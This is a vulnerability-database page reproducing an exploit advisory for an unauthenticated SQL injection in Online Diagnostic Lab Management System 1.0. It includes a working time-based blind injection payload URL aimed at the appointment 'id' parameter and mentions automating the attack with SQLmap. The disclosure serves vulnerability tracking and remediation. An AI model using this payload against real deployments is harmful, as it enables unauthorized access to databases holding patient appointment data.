Vulners
Lucene search
Online Diagnostic Lab Management System 1.0 - SQL Injection Vulnerability
#Exploit Title: Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)
#Exploit Author: Himash
#Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip
#Version: 1.0
#Tested on: Kali Linux 2021.4, PHP 7.2.34
#SQL Injection
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
Online Diagnostic Lab Management System 1.0 is vulnerable to the SQL Injection in 'id' parameter of the 'appointment list' page.
#Steps to reproduce
Following URL is vulnerable to SQL Injection in the 'id' field.
http://localhost/odlms/?page=appointments/view_appointment&id=1%27%20AND%20(SELECT%208053%20FROM%20(SELECT(SLEEP(7)))dJOC)%20AND%20%27test%27=%27test
Server accepts the payload and the response get delayed by 7 seconds.
#Impact
An attcker can compromise the database of the application by manual method or by automated tools such as SQLmap.
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jan 2022 00:00Current
0.1Low risk
Vulners AI Score0.1